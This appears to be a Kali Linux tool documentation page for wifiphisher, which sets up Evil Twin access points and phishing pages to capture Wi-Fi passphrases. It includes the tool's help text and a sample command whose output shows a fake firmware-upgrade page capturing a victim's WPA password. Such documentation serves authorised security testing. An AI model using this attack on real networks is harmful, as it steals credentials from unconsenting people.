wifiphisher Package Description

Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim’s perspective, the attack takes place in three phases:

  1. Victim is deauthenticated from their access point.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
  3. Victim is served a realistic specially-customized phishing page.

Source: https://wifiphisher.org/docs.html
wifiphisher Homepage | Kali wifiphisher Repo

  • Author: sophron
  • License: GPLv3

Tools included in the wifiphisher package

wifiphisher – Automated phishing attacks against Wi-Fi networks
root@kali:~# wifiphisher -h
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
                   [-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
                   [-T TEMPLATE] [-pK PRESHAREDKEY]

optional arguments:
  -h, --help            show this help message and exit
  -s SKIP, --skip SKIP  Skip deauthing this MAC address. Example: -s
                        00:11:BB:33:44:AA
  -jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
                        Choose monitor mode interface. By default script will
                        find the most powerful interface and starts monitor
                        mode on it. Example: -jI mon5
  -aI APINTERFACE, --apinterface APINTERFACE
                        Choose access point interface. By default script will
                        find the most powerful interface and starts an access
                        point on it. Example: -aI wlan0
  -t TIMEINTERVAL, --timeinterval TIMEINTERVAL
                        Choose the time interval between packets being sent.
                        Default is as fast as possible. If you see scapy
                        errors like 'no buffer space' try: -t .00001
  -p PACKETS, --packets PACKETS
                        Choose the number of packets to send in each deauth
                        burst. Default value is 1; 1 packet to the client and
                        1 packet to the AP. Send 2 deauth packets to the
                        client and 2 deauth packets to the AP: -p 2
  -d, --directedonly    Skip the deauthentication packets to the broadcast
                        address ofthe access points and only send them to
                        client/AP pairs
  -nJ, --nojamming      Skip the deauthentication phase.
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue access point (Evil Twin)
                        This will skip Access Point selection phase.
  -T TEMPLATE, --template TEMPLATE
                        Choose the template to run.Using this option will skip
                        the interactive selection
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point

wifiphisher Usage Examples

Do not perform jamming (-nJ), create a wireless access point (-e “Free Wi-Fi”) and present a fake firmware upgrade to clients (-T firmware-upgrade). When a client connects, they a presented with a webpage to enter the PSK of their network:

root@kali:~# wifiphisher -nJ -e "Free Wi-Fi" -T firmware-upgrade
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...

Jamming devices:



DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3


HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93

Menu